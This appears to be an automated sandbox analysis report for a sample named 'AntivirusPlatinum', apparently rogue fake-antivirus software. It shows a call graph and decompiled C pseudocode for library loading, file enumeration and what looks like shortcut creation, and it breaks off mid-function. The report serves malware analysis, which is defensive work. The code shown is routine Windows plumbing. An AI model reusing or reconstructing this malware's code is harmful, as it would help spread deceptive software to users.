11811->11812 11813 40197f 11812->11813 11814 4018ff 11812->11814 11815 4054ed 35 API calls 11813->11815 11816 4054ed 35 API calls 11814->11816 11817 401998 11815->11817 11818 401910 11816->11818 11840 402790 11817->11840 11820 401ce5 51 API calls 11818->11820 11822 401917 11820->11822 11824 401921 OemToCharBuffA 11822->11824 11825 40196c 11822->11825 11823 4019b5 11830 40a810 35 API calls 11823->11830 11824->11825 11828 401934 11824->11828 11827 40a810 35 API calls 11825->11827 11827->11831 11873 4016bf 11828->11873 11830->11831 11831->10304 11831->10308 11835 40e144 MultiByteToWideChar 11836 401955 11835->11836 11837 401708 35 API calls 11836->11837 11838 40195d 11837->11838 11839 4016bf 35 API calls 11838->11839 11839->11825 11844 402796 11840->11844 11841 401ce5 51 API calls 11841->11844 11842 4019a4 11842->11823 11845 401722 11842->11845 11843 401264 35 API calls 11843->11844 11844->11841 11844->11842 11844->11843 11846 402511 65 API calls 11845->11846 11847 40173e 11846->11847 11848 401751 11847->11848 11849 4017c6 11847->11849 11871 401742 11847->11871 11880 401278 11848->11880 11851 4016a4 35 API calls 11849->11851 11849->11871 11853 4017d6 11851->11853 11852 40175f 11855 401708 35 API calls 11852->11855 11854 4016bf 35 API calls 11853->11854 11856 4017e1 11854->11856 11857 40177f 11855->11857 11858 40e144 MultiByteToWideChar 11856->11858 11859 40e115 WideCharToMultiByte 11857->11859 11860 4017ee 11858->11860 11861 401788 11859->11861 11862 401708 35 API calls 11860->11862 11864 401708 35 API calls 11861->11864 11863 4017f6 11862->11863 11866 4016bf 35 API calls 11863->11866 11865 40179f 11864->11865 11867 4017ba 11865->11867 11885 4016d9 11865->11885 11866->11871 11870 40a205 ctype 2 API calls 11867->11870 11867->11871 11869 4017b1 11872 4016bf 35 API calls 11869->11872 11870->11871 11871->11823 11872->11867 11874 4016d1 11873->11874 11875 4016c8 11873->11875 11877 4016a4 11874->11877 11876 4012b7 35 API calls 11875->11876 11876->11874 11878 401313 35 API calls 11877->11878 11879 4016ae 11878->11879 11879->11835 11890 40a1ec GetProcessHeap RtlAllocateHeap 11880->11890 11882 401289 11883 40129d 11882->11883 11884 403443 31 API calls 11882->11884 11883->11852 11884->11883 11886 40dbcb 2 API calls 11885->11886 11887 4016e2 11886->11887 11888 4016bf 35 API calls 11887->11888 11889 4016f0 11888->11889 11889->11869 11890->11882 11891->10325 11893 4066d8 11892->11893 11894 40672d VariantInit 11893->11894 11896 4066f1 PeekMessageA 11893->11896 11895 40675d 11894->11895 11895->10332 11897 406703 TranslateMessage DispatchMessageA GetMessageA 11896->11897 11898 406724 GetTickCount 11896->11898 11897->11898 11898->11893 11899->10338 11901 4065f8 11900->11901 11912 40a1ec GetProcessHeap RtlAllocateHeap 11901->11912 11903 4066ac 11903->10339 11904 40a205 ctype 2 API calls 11904->11903 11905 406606 11905->11903 11905->11904 11907 406a28 11906->11907 11913 40a1ec GetProcessHeap RtlAllocateHeap 11907->11913 11909 406b4a 11909->10343 11910 406a2f 11910->11909 11911 40a5bd CompareStringA 11910->11911 11911->11910 11912->11905 11913->11910 12088 40cb2b 12089 40309d 15 API calls 12088->12089 12090 40cb4b 12089->12090 12092 40cb83 SendMessageA 12090->12092 12093 40cb8e 12090->12093 12097 40cb55 12090->12097 12091 40cb66 12092->12093 12094 40cba7 12093->12094 12095 40cb97 SendDlgItemMessageA 12093->12095 12096 40ba36 28 API calls 12094->12096 12095->12094 12099 40cbad GetDlgItem SendMessageA GetSysColor SendMessageA 12096->12099 12097->12091 12098 40cc14 EndDialog 12097->12098 12098->12091 12100 40bf99 47 API calls 12099->12100 12101 40cbe8 12100->12101 12101->12097 12102 40cbf2 12101->12102 12103 406d54 29 API calls 12102->12103 12104 40cc05 12103->12104 12105 40a205 ctype 2 API calls 12104->12105 12106 40cc10 12105->12106 12106->12091

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 762 411585-4115cd LoadLibraryA * 2 #17 LoadLibraryA 763 4115ec-4115fc SHGetMalloc 762->763 764 4115cf-4115dd GetProcAddress 762->764 765 4115e5-4115e6 FreeLibrary 764->765 766 4115df-4115e2 764->766 765->763 766->765
                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                      			E00411585(signed int* __ecx) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				struct HINSTANCE__* _t7;
                                                                                                                                                      				_Unknown_base(*)()* _t11;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      				struct HINSTANCE__* _t18;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				struct HINSTANCE__** _t21;
                                                                                                                                                      
                                                                                                                                                      				_t21 = __ecx;
                                                                                                                                                      				__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                      				 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                      				_t7 = LoadLibraryA("riched32.dll"); // executed
                                                                                                                                                      				 *_t21 = _t7;
                                                                                                                                                      				_t21[1] = LoadLibraryA("riched20.dll");
                                                                                                                                                      				__imp__#17(_t16, _t20, __ecx, __ecx);
                                                                                                                                                      				_v12 = 8;
                                                                                                                                                      				_v8 = 0x7ff;
                                                                                                                                                      				_t18 = LoadLibraryA("COMCTL32.DLL");
                                                                                                                                                      				if(_t18 != 0) {
                                                                                                                                                      					_t11 = GetProcAddress(_t18, "InitCommonControlsEx");
                                                                                                                                                      					if(_t11 != 0) {
                                                                                                                                                      						 *_t11( &_v12);
                                                                                                                                                      					}
                                                                                                                                                      					FreeLibrary(_t18);
                                                                                                                                                      				}
                                                                                                                                                      				__imp__SHGetMalloc(0x41fff0); // executed
                                                                                                                                                      				return _t21;
                                                                                                                                                      			}











                                                                                                                                                      0x00411592
                                                                                                                                                      0x00411594
                                                                                                                                                      0x00411598
                                                                                                                                                      0x004115a0
                                                                                                                                                      0x004115a7
                                                                                                                                                      0x004115ab
                                                                                                                                                      0x004115ae
                                                                                                                                                      0x004115b9
                                                                                                                                                      0x004115c0
                                                                                                                                                      0x004115c9
                                                                                                                                                      0x004115cd
                                                                                                                                                      0x004115d5
                                                                                                                                                      0x004115dd
                                                                                                                                                      0x004115e3
                                                                                                                                                      0x004115e3
                                                                                                                                                      0x004115e6
                                                                                                                                                      0x004115e6
                                                                                                                                                      0x004115f1
                                                                                                                                                      0x004115fc

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(riched32.dll,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,?,?,?,0040D3EE), ref: 004115A0
                                                                                                                                                      • LoadLibraryA.KERNEL32(riched20.dll,?,0040D3EE), ref: 004115A9
                                                                                                                                                      • #17.COMCTL32(?,0040D3EE), ref: 004115AE
                                                                                                                                                      • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,0040D3EE), ref: 004115C7
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004115D5
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,0040D3EE), ref: 004115E6
                                                                                                                                                      • SHGetMalloc.SHELL32(0041FFF0), ref: 004115F1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressFreeMallocProc
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$COMCTL32.DLL$InitCommonControlsEx$riched20.dll$riched32.dll
                                                                                                                                                      • API String ID: 253899923-3476963665
                                                                                                                                                      • Opcode ID: e3c62c2280fe2742b857e97263135e7d095fb7be557769444439f8313c917933
                                                                                                                                                      • Instruction ID: 315302b8a226ed3062516fc9a18bbbd533a07d3aa027722884380aaa5de4aa0e
                                                                                                                                                      • Opcode Fuzzy Hash: e3c62c2280fe2742b857e97263135e7d095fb7be557769444439f8313c917933
                                                                                                                                                      • Instruction Fuzzy Hash: 3DF08671600304BBD710ABA5CD09BEAFBE8EF84711F21812EE151D3190DBF8D490CB28
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1132 405c10-405c2a call 406ea5 1135 405c30-405c35 1132->1135 1136 405dec-405df1 1132->1136 1137 405c37-405c3b 1135->1137 1138 405c4c-405c57 call 40e144 1135->1138 1139 405df3-405df6 1136->1139 1140 405e07-405e12 call 40e115 1136->1140 1137->1138 1141 405c3d-405c4a call 40e338 1137->1141 1146 405c5c-405c6c 1138->1146 1139->1140 1143 405df8-405e05 call 40a477 1139->1143 1148 405e17-405e27 1140->1148 1141->1146 1143->1148 1152 405ca2-405cad FindNextFileW 1146->1152 1153 405c6e-405c80 FindFirstFileW 1146->1153 1149 405e29-405e3b FindFirstFileA 1148->1149 1150 405e5f-405e6a FindNextFileA 1148->1150 1155 405e8a-405f92 call 40a477 call 4073db call 40a477 call 40e144 call 401030 call 40a477 call 40df79 * 3 call 40ded1 call 40dadd 1149->1155 1156 405e3d-405e46 GetLastError 1149->1156 1157 405e81-405e84 1150->1157 1158 405e6c-405e7b GetLastError 1150->1158 1161 405cc4-405cc7 1152->1161 1162 405caf-405cbe GetLastError 1152->1162 1159 405c82-405c8b GetLastError 1153->1159 1160 405ccd-405ddc call 40e338 call 407432 call 40e338 call 40e115 call 401030 call 40e115 call 40df79 * 3 call 40ded1 call 40dafb 1153->1160 1163 405f99-405faa 1155->1163 1215 405f94-405f96 1155->1215 1165 405e52 1156->1165 1166 405e48 1156->1166 1157->1155 1157->1163 1158->1157 1159->1165 1168 405c91-405c94 1159->1168 1160->1163 1216 405de2-405de7 1160->1216 1161->1160 1161->1163 1162->1161 1171 405e54-405e5a 1165->1171 1170 405e4b 1166->1170 1168->1165 1173 405c9a-405c9d 1168->1173 1170->1165 1175 405e4d-405e50 1170->1175 1171->1163 1173->1170 1175->1171 1215->1163 1216->1163
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E00405C10(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				char* _t98;
                                                                                                                                                      				void* _t134;
                                                                                                                                                      				char _t136;
                                                                                                                                                      				short* _t140;
                                                                                                                                                      				intOrPtr _t169;
                                                                                                                                                      				void* _t175;
                                                                                                                                                      				long _t176;
                                                                                                                                                      				signed int _t179;
                                                                                                                                                      				void* _t180;
                                                                                                                                                      				short* _t182;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				intOrPtr _t197;
                                                                                                                                                      				short* _t204;
                                                                                                                                                      				intOrPtr _t206;
                                                                                                                                                      				void* _t208;
                                                                                                                                                      				void* _t210;
                                                                                                                                                      				void* _t221;
                                                                                                                                                      
                                                                                                                                                      				_t197 = __edx;
                                                                                                                                                      				_t186 = __ecx;
                                                                                                                                                      				_t208 = _t210 - 0x68;
                                                                                                                                                      				_push(_t179);
                                                                                                                                                      				if(E00406EA5() == 0) {
                                                                                                                                                      					_t98 =  *((intOrPtr*)(_t208 + 0x74));
                                                                                                                                                      					if(_t98 == 0 ||  *_t98 == 0) {
                                                                                                                                                      						E0040E115(_t186,  *((intOrPtr*)(_t208 + 0x78)), _t208 - 0x5e8, 0x1000000);
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040A477(_t208 - 0x5e8, _t98);
                                                                                                                                                      					}
                                                                                                                                                      					_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                      					_t180 = _t179 | 0xffffffff;
                                                                                                                                                      					_push(_t208 - 0xd8);
                                                                                                                                                      					if( *(_t208 + 0x70) != _t180) {
                                                                                                                                                      						if(FindNextFileA( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                      							 *(_t208 + 0x70) = _t180;
                                                                                                                                                      							 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t131 != 0x00000012;
                                                                                                                                                      						}
                                                                                                                                                      						if( *(_t208 + 0x70) == _t180) {
                                                                                                                                                      							goto L32;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L30;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t134 = FindFirstFileA(_t208 - 0x5e8, ??);
                                                                                                                                                      						 *(_t208 + 0x70) = _t134;
                                                                                                                                                      						if(_t134 != _t180) {
                                                                                                                                                      							L30:
                                                                                                                                                      							E0040A477(_t206, _t208 - 0x5e8);
                                                                                                                                                      							E0040A477(E004073DB(_t206), _t208 - 0xac);
                                                                                                                                                      							_t182 = _t206 + 0x400;
                                                                                                                                                      							E0040E144(_t206, _t182, 0x1000000);
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0xbc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0xb8));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0xd8));
                                                                                                                                                      							asm("adc edx, edi");
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                      							E0040A477(_t206 + 0xc80, _t208 + 0x58);
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0xd4));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0xd0));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0xcc));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0xc8));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0xc4));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0xc0));
                                                                                                                                                      							E0040DF79(_t182, _t206 + 0xc14, _t208 - 0xc4);
                                                                                                                                                      							E0040DF79(_t182, _t206 + 0xc38, _t208 - 0xd4);
                                                                                                                                                      							E0040DF79(_t182, _t206 + 0xc5c, _t208 - 0xcc);
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc0c)) = E0040DED1(_t206 + 0xc14);
                                                                                                                                                      							if(E0040DADD(_t206) != 0) {
                                                                                                                                                      								 *_t182 = 0;
                                                                                                                                                      							}
                                                                                                                                                      							L32:
                                                                                                                                                      							 *(_t206 + 0x1098) =  *(_t206 + 0x1098) & 0x00000000;
                                                                                                                                                      							return  *(_t208 + 0x70);
                                                                                                                                                      						}
                                                                                                                                                      						if(GetLastError() == 2) {
                                                                                                                                                      							L25:
                                                                                                                                                      							_t136 = 0;
                                                                                                                                                      							L26:
                                                                                                                                                      							 *((char*)(_t206 + 0x109c)) = _t136;
                                                                                                                                                      							goto L32;
                                                                                                                                                      						}
                                                                                                                                                      						L23:
                                                                                                                                                      						if(_t221 == 0) {
                                                                                                                                                      							goto L25;
                                                                                                                                                      						}
                                                                                                                                                      						_t136 = 1;
                                                                                                                                                      						goto L26;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t140 =  *((intOrPtr*)(_t208 + 0x78));
                                                                                                                                                      				if(_t140 == 0 ||  *_t140 == 0) {
                                                                                                                                                      					E0040E144( *((intOrPtr*)(_t208 + 0x74)), _t208 - 0x9e8, 0x1000000);
                                                                                                                                                      				} else {
                                                                                                                                                      					E0040E338(_t208 - 0x9e8, _t140);
                                                                                                                                                      				}
                                                                                                                                                      				_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                      				_t183 = _t179 | 0xffffffff;
                                                                                                                                                      				_push(_t208 - 0x1e8);
                                                                                                                                                      				if( *(_t208 + 0x70) != _t183) {
                                                                                                                                                      					if(FindNextFileW( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                      						 *(_t208 + 0x70) = _t183;
                                                                                                                                                      						 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t172 != 0x00000012;
                                                                                                                                                      					}
                                                                                                                                                      					if( *(_t208 + 0x70) == _t183) {
                                                                                                                                                      						goto L32;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t175 = FindFirstFileW(_t208 - 0x9e8, ??); // executed
                                                                                                                                                      					 *(_t208 + 0x70) = _t175;
                                                                                                                                                      					if(_t175 != _t183) {
                                                                                                                                                      						L13:
                                                                                                                                                      						E0040E338(_t206 + 0x400, _t208 - 0x9e8);
                                                                                                                                                      						E0040E338(E00407432(_t206 + 0x400), _t208 - 0x1bc);
                                                                                                                                                      						E0040E115(_t186, _t206 + 0x400, _t206, 0x1000000);
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0x1cc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0x1c8));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0x1e8));
                                                                                                                                                      						asm("adc edx, ebx");
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                      						E0040E115( *((intOrPtr*)(_t208 - 0x1c8)), _t208 + 0x4c, _t206 + 0xc80, 0x1000000);
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0x1e4));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0x1e0));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0x1dc));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0x1d8));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0x1d4));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0x1d0));
                                                                                                                                                      						E0040DF79(0, _t206 + 0xc14, _t208 - 0x1d4);
                                                                                                                                                      						E0040DF79(0, _t206 + 0xc38, _t208 - 0x1e4);
                                                                                                                                                      						E0040DF79(0, _t206 + 0xc5c, _t208 - 0x1dc);
                                                                                                                                                      						_t169 = E0040DED1(_t206 + 0xc14);
                                                                                                                                                      						_t204 = _t206 + 0x400;
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc0c)) = _t169;
                                                                                                                                                      						if(E0040DAFB(_t204) != 0) {
                                                                                                                                                      							 *_t204 = 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L32;
                                                                                                                                                      					}
                                                                                                                                                      					_t176 = GetLastError();
                                                                                                                                                      					if(_t176 == 2 || _t176 == 3) {
                                                                                                                                                      						goto L25;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t221 = _t176 - 0x12;
                                                                                                                                                      						goto L23;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}






















                                                                                                                                                      0x00405c10
                                                                                                                                                      0x00405c10
                                                                                                                                                      0x00405c11
                                                                                                                                                      0x00405c1b
                                                                                                                                                      0x00405c2a
                                                                                                                                                      0x00405dec
                                                                                                                                                      0x00405df1
                                                                                                                                                      0x00405e12
                                                                                                                                                      0x00405df8
                                                                                                                                                      0x00405e00
                                                                                                                                                      0x00405e00
                                                                                                                                                      0x00405e17
                                                                                                                                                      0x00405e1a
                                                                                                                                                      0x00405e23
                                                                                                                                                      0x00405e27
                                                                                                                                                      0x00405e6a
                                                                                                                                                      0x00405e6c
                                                                                                                                                      0x00405e7b
                                                                                                                                                      0x00405e7b
                                                                                                                                                      0x00405e84
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e29
                                                                                                                                                      0x00405e30
                                                                                                                                                      0x00405e36
                                                                                                                                                      0x00405e3b
                                                                                                                                                      0x00405e8a
                                                                                                                                                      0x00405e92
                                                                                                                                                      0x00405ea5
                                                                                                                                                      0x00405eab
                                                                                                                                                      0x00405eb3
                                                                                                                                                      0x00405ed3
                                                                                                                                                      0x00405edf
                                                                                                                                                      0x00405eef
                                                                                                                                                      0x00405ef2
                                                                                                                                                      0x00405ef8
                                                                                                                                                      0x00405f03
                                                                                                                                                      0x00405f0f
                                                                                                                                                      0x00405f1b
                                                                                                                                                      0x00405f27
                                                                                                                                                      0x00405f33
                                                                                                                                                      0x00405f3f
                                                                                                                                                      0x00405f54
                                                                                                                                                      0x00405f66
                                                                                                                                                      0x00405f78
                                                                                                                                                      0x00405f85
                                                                                                                                                      0x00405f92
                                                                                                                                                      0x00405f96
                                                                                                                                                      0x00405f96
                                                                                                                                                      0x00405f99
                                                                                                                                                      0x00405f99
                                                                                                                                                      0x00405faa
                                                                                                                                                      0x00405faa
                                                                                                                                                      0x00405e46
                                                                                                                                                      0x00405e52
                                                                                                                                                      0x00405e52
                                                                                                                                                      0x00405e54
                                                                                                                                                      0x00405e54
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e54
                                                                                                                                                      0x00405e4b
                                                                                                                                                      0x00405e4b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e4f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e4f
                                                                                                                                                      0x00405e27
                                                                                                                                                      0x00405c30
                                                                                                                                                      0x00405c35
                                                                                                                                                      0x00405c57
                                                                                                                                                      0x00405c3d
                                                                                                                                                      0x00405c45
                                                                                                                                                      0x00405c45
                                                                                                                                                      0x00405c5c
                                                                                                                                                      0x00405c5f
                                                                                                                                                      0x00405c68
                                                                                                                                                      0x00405c6c
                                                                                                                                                      0x00405cad
                                                                                                                                                      0x00405caf
                                                                                                                                                      0x00405cbe
                                                                                                                                                      0x00405cbe
                                                                                                                                                      0x00405cc7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c6e
                                                                                                                                                      0x00405c75
                                                                                                                                                      0x00405c7b
                                                                                                                                                      0x00405c80
                                                                                                                                                      0x00405ccd
                                                                                                                                                      0x00405cdb
                                                                                                                                                      0x00405cee
                                                                                                                                                      0x00405cf6
                                                                                                                                                      0x00405d16
                                                                                                                                                      0x00405d22
                                                                                                                                                      0x00405d33
                                                                                                                                                      0x00405d36
                                                                                                                                                      0x00405d3c
                                                                                                                                                      0x00405d47
                                                                                                                                                      0x00405d53
                                                                                                                                                      0x00405d5f
                                                                                                                                                      0x00405d6b
                                                                                                                                                      0x00405d77
                                                                                                                                                      0x00405d83
                                                                                                                                                      0x00405d98
                                                                                                                                                      0x00405daa
                                                                                                                                                      0x00405dbc
                                                                                                                                                      0x00405dc3
                                                                                                                                                      0x00405dc8
                                                                                                                                                      0x00405dcf
                                                                                                                                                      0x00405ddc
                                                                                                                                                      0x00405de4
                                                                                                                                                      0x00405de4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405ddc
                                                                                                                                                      0x00405c82
                                                                                                                                                      0x00405c8b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c9a
                                                                                                                                                      0x00405c9a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c9a
                                                                                                                                                      0x00405c8b

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C75
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405C82
                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,00000000,?,01000000,?,?,00000000), ref: 00405CA5
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405CB2
                                                                                                                                                        • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E30
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405E3D
                                                                                                                                                      • FindNextFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E62
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405E6F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileFindLast$FirstNext$ByteCharMultiVersionWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3067395930-0
                                                                                                                                                      • Opcode ID: 1a45d5538c5dfd2a89186e743a16fdedd99f6725e566e313df3d702d666fbaf3
                                                                                                                                                      • Instruction ID: e8a49d90b98f97b96c040a5bbc5ad6dfd2bbe94d724088299ed6a28abedc6e2c
                                                                                                                                                      • Opcode Fuzzy Hash: 1a45d5538c5dfd2a89186e743a16fdedd99f6725e566e313df3d702d666fbaf3
                                                                                                                                                      • Instruction Fuzzy Hash: 0EA109B19006489BDB20EF75CC81BDB77F8EF04304F10496BE59AE2291DB78AA85CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 55%
                                                                                                                                                      			E0040A9BD(intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				short _v532;
                                                                                                                                                      				char _v1556;
                                                                                                                                                      				char* _t34;
                                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                      				intOrPtr* _t58;
                                                                                                                                                      				int _t60;
                                                                                                                                                      
                                                                                                                                                      				_t60 = 0;
                                                                                                                                                      				__imp__OleInitialize(0);
                                                                                                                                                      				_t34 =  &_v8;
                                                                                                                                                      				__imp__CoCreateInstance(0x4128cc, 0, 1, 0x41281c, _t34); // executed
                                                                                                                                                      				if(_t34 >= 0) {
                                                                                                                                                      					_t36 = _v8;
                                                                                                                                                      					 *((intOrPtr*)( *_t36 + 0x50))(_t36, _a4);
                                                                                                                                                      					_t38 = _v8;
                                                                                                                                                      					 *((intOrPtr*)( *_t38 + 0x1c))(_t38, _a12);
                                                                                                                                                      					if(_a16 != 0) {
                                                                                                                                                      						_t58 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t58 + 0x44))(_t58, _a16, 0);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a20 != _t60) {
                                                                                                                                                      						_t56 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t56 + 0x2c))(_t56, _a20);
                                                                                                                                                      					}
                                                                                                                                                      					E0040A477( &_v1556, _a4);
                                                                                                                                                      					E00407720( &_v1556);
                                                                                                                                                      					if(_v1556 != _t60) {
                                                                                                                                                      						_t54 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t54 + 0x24))(_t54,  &_v1556);
                                                                                                                                                      					}
                                                                                                                                                      					_t44 = _v8;
                                                                                                                                                      					_push( &_v12);
                                                                                                                                                      					_push(0x4128bc);
                                                                                                                                                      					_push(_t44);
                                                                                                                                                      					if( *((intOrPtr*)( *_t44))() >= 0) {
                                                                                                                                                      						MultiByteToWideChar(_t60, _t60, _a8, 0xffffffff,  &_v532, 0x104);
                                                                                                                                                      						_t50 = _v12;
                                                                                                                                                      						_push(1);
